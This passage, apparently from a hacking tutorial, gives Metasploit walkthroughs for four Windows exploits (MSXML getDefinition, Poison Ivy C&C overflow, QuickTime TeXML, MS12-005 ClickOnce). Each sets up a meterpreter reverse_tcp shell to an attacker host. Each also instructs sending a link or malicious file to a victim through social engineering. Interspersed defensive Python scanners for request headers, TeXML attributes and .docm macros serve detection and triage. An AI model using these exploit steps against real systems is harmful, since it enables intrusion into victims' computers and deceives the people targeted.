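def scan_requests(requests: List[str]) -> List[int]:
    """Indices of the requests that inspect_connection_header flags."""
    return [i for i, r in enumerate(requests) if inspect_connection_header(r)]


if __name__ == "__main__":
    for i in scan_requests(SAMPLE_REQUESTS):
        print(f"request {i}: {inspect_connection_header(SAMPLE_REQUESTS[i])}")
```

Only the third constructed request is reported. The token check catches payloads that are short but contain bytes a Connection header never carries, which the length check alone would miss.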
Attacking a Remote Windows 7 PC Using the Microsoft XML Core Services (MSXML)
Uninitialized Memory Corruption :
This module exploits a memory corruption flaw in Microsoft XML Core Services
when trying to access an uninitialized Node with the getDefinition API, which may
corrupt memory, allowing remote code execution.
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/windows/browser/msxml_get_definition_code_exec
Msf exploit (msxml_get_definition_code_exec)>set payload windows/meterpreter/reverse_tcp
Msf exploit (msxml_get_definition_code_exec)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (msxml_get_definition_code_exec)>set srvhost 192.168.42.131 (this must be an address on the local machine)
Msf exploit (msxml_get_definition_code_exec)>set uripath / (the URL path to use for this exploit)
Msf exploit (msxml_get_definition_code_exec)>exploit
Now the URL you should give to your victim is http://192.168.42.131:8080/
Send the link of the server to the victim via any social engineering technique.
When the victim opens that link in their browser, you get access to the victim's PC.
Use "sessions -l" and the session number to connect to the session.
Attacking a Remote Windows 7 PC Using the Poison Ivy 2.3.2 C&C Server Buffer
Overflow :
This module exploits a stack buffer overflow in the Poison Ivy 2.3.2 C&C server. The
exploit does not need to know the password chosen for the bot/server
communication. If the C&C is configured with the default 'admin' password, the
exploit should work fine. If the C&C is configured with another password,
the exploit can fail. The 'check' command can be used to determine whether the C&C
target is using the default 'admin' password. Hopefully an exploit attempt won't crash
the Poison Ivy C&C process, just the thread responsible for handling the
connection. Because of this the module provides the RANDHEADER option and a
bruteforce target. If RANDHEADER is set, a random header will be used. If the
bruteforce target is selected, a random header will be sent in case the default for
the password 'admin' doesn't work. Bruteforce will stop after 5 tries or once a session
is obtained.
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/windows/misc/poisonivy_bof
Msf exploit (poisonivy_bof)>set payload windows/meterpreter/reverse_tcp
Msf exploit (poisonivy_bof)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (poisonivy_bof)>set rhost 192.168.12.119 (IP of Victim PC)
Msf exploit (poisonivy_bof)>exploit
Now the URL you should give to your victim is http://192.168.42.131
Send the link of the server to the victim via any social engineering technique.
When the victim opens that link in their browser, you get access to the victim's PC.
Use "sessions -l" and the session number to connect to the session.
Attacking a Remote Windows PC Using the Apple QuickTime TeXML Stack Buffer
Overflow :
This module exploits a vulnerability found in Apple QuickTime. When handling a
TeXML file, it is possible to trigger a stack-based buffer overflow and then gain
arbitrary code execution in the context of the user. The flaw is generally
known as a bug in processing the 'transform' attribute; however, that attack
vector seems to only cause a TerminateProcess call due to a corrupt stack cookie,
and more data will only trigger a warning about the malformed XML file. This
module exploits the 'color' value instead, which accomplishes the same thing.
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/windows/fileformat/apple_quicktime_texml
Msf exploit (apple_quicktime_texml)>set payload windows/meterpreter/reverse_tcp
Msf exploit (apple_quicktime_texml)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (apple_quicktime_texml)>set srvhost 192.168.1.3 (Victim IP)
Msf exploit (apple_quicktime_texml)>show targets
Msf exploit (apple_quicktime_texml)>set target 0
Msf exploit (apple_quicktime_texml)>exploit
After the malicious file is generated successfully, it is stored on your local computer at:
/root/.msf4/local/msf.xml
Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit executes successfully.
Now send your msf.xml file to the victim; as soon as they download and open it, you can access a meterpreter shell on the victim's computer.
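The description above points at the two TeXML attributes that matter for this bug, 'transform' and 'color', and notes that a truly malformed file only produces a warning. A mail gateway or sandbox can therefore triage TeXML attachments with a schema-agnostic rule: parse the XML, and treat any attribute value far longer than a real color or transform string as suspicious, with unparseable files quarantined separately. The scanner below is an added example for this tutorial, not code from the Metasploit module or from Apple; the TeXML element names in the constructed samples are recalled from the text-track format and are an assumption, as is the 512-character threshold.

```python
import xml.etree.ElementTree as ET
from typing import List, Tuple

# Assumed threshold: legitimate TeXML attribute values (colors, transforms,
# font names) are a few dozen characters at most.
MAX_ATTR_LEN = 512

# Attributes the description above names as the overflow triggers.
SENSITIVE_ATTRS = {"color", "transform"}

# Constructed samples. The element names follow the TeXML text-track format
# from memory and are an assumption; the scanner itself does not depend on them.
BENIGN_TEXML = (
    '<?xml version="1.0"?>'
    "<TeXML><textStream><textSample>"
    '<style color="0, 0, 65535" font="Helvetica" />hello'
    "</textSample></textStream></TeXML>"
)
OVERSIZED_TEXML = (
    '<?xml version="1.0"?>'
    "<TeXML><textStream><textSample>"
    '<style color="' + "A" * 4096 + '" />hello'
    "</textSample></textStream></TeXML>"
)
# Unclosed elements: the kind of file the description says only triggers a warning.
MALFORMED_TEXML = '<TeXML><textStream><textSample><style color="x"></TeXML>'


def oversized_attributes(xml_text: str, limit: int = MAX_ATTR_LEN) -> List[Tuple[str, str, int]]:
    """Return (element, attribute, length) for every attribute value longer than `limit`.

    Raises xml.etree.ElementTree.ParseError for malformed input; callers decide
    what to do with files that do not parse at all.
    """
    root = ET.fromstring(xml_text)
    findings: List[Tuple[str, str, int]] = []
    for elem in root.iter():
        for name, value in elem.attrib.items():
            if len(value) > limit:
                findings.append((elem.tag, name, len(value)))
    return findings


def classify(xml_text: str) -> str:
    """Triage verdict: 'clean', 'oversized', 'suspicious' or 'malformed'.

    'suspicious' is reserved for oversized values in the attributes the
    description above ties to the overflow; other oversized attributes are
    reported as 'oversized' so an analyst can decide.
    """
    try:
        findings = oversized_attributes(xml_text)
    except ET.ParseError:
        return "malformed"
    if any(attr in SENSITIVE_ATTRS for _, attr, _ in findings):
        return "suspicious"
    return "oversized" if findings else "clean"


if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_TEXML), ("oversized", OVERSIZED_TEXML), ("malformed", MALFORMED_TEXML)):
        print(f"{label}: {classify(doc)}")
```

The verdict separates the three cases the description distinguishes: a well-formed file with an ordinary color value, a well-formed file whose color value is thousands of bytes long, and a file that is not valid XML.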
Attacking a Remote Windows PC Using the Microsoft Office ClickOnce
Unsafe Object Package Handling Vulnerability :
This module exploits a vulnerability found in Microsoft Office's ClickOnce feature.
When handling a macro document, the application fails to recognize certain file
extensions as dangerous executables, which can be used to bypass the warning
message. This allows you to trick your victim into opening the malicious
document, which will load up either a Python or Ruby payload of your
choosing, and then finally download and execute our executable.
Open a BackTrack terminal, type msfconsole, then type the command below:
use exploit/windows/fileformat/ms12_005
Msf exploit (ms12_005)>set payload windows/meterpreter/reverse_tcp
Msf exploit (ms12_005)>set lhost 192.168.42.131 (IP of Local Host)
Msf exploit (ms12_005)>exploit
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.42.131
exploit
After the malicious document file is generated successfully, it is stored on your local computer at:
/root/.msf4/local/msf.docm
Now send your msf.docm file to the victim; as soon as they download and open it, you can access a meterpreter shell on the victim's computer.
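The description above says the bypass lives inside a macro-enabled document that carries an embedded object package. A .docm is an Open XML zip container, so a gateway can inventory its active content before the user ever sees a warning dialog: a VBA project part and any embedded OLE objects under the embeddings directory are both reasons to route the file to a sandbox rather than deliver it. The inspector below is an added example for this tutorial, not code from the Metasploit module or from Microsoft; the OOXML part names and the compound-file magic are standard Office package details and not taken from the page, and the sample document is constructed in memory.

```python
import io
import zipfile
from typing import Dict, List

# OOXML part names from the Word package layout (standard Office details,
# not taken from the tutorial): the VBA project and the embedded-object directory.
MACRO_PART = "word/vbaProject.bin"
EMBED_PREFIX = "word/embeddings/"
# Header of an OLE compound file, the container used for embedded objects.
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"


def build_sample_docm(with_macro: bool, with_embedding: bool) -> bytes:
    """Construct a minimal OOXML-shaped zip in memory (a constructed sample, not a real document)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            z.writestr(MACRO_PART, OLE_MAGIC + b"\x00" * 16)
        if with_embedding:
            z.writestr(EMBED_PREFIX + "oleObject1.bin", OLE_MAGIC + b"\x00" * 16)
    return buf.getvalue()


def inspect_docm(data: bytes) -> Dict[str, object]:
    """Report the active content in an OOXML document: macros and embedded objects."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        embeddings: List[str] = [n for n in names if n.startswith(EMBED_PREFIX)]
        # An embedded part that starts with the compound-file header is an OLE
        # object; object packages of the kind the description mentions are stored this way.
        ole_embeddings = [n for n in embeddings if z.read(n).startswith(OLE_MAGIC)]
    has_macro = MACRO_PART in names
    return {
        "has_macro": has_macro,
        "embeddings": embeddings,
        "ole_embeddings": ole_embeddings,
        # Either kind of active content is enough to hold the file for sandboxing.
        "needs_review": has_macro or bool(embeddings),
    }


if __name__ == "__main__":
    print(inspect_docm(build_sample_docm(with_macro=True, with_embedding=True)))
    print(inspect_docm(build_sample_docm(with_macro=False, with_embedding=False)))
```

Because the check only reads the zip directory and the first bytes of each embedded part, it is cheap enough to run on every inbound attachment, and it does not depend on recognising the particular file extension that the warning dialog fails to classify.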
Thanks to all dears for reading this article
By Red H4t V!per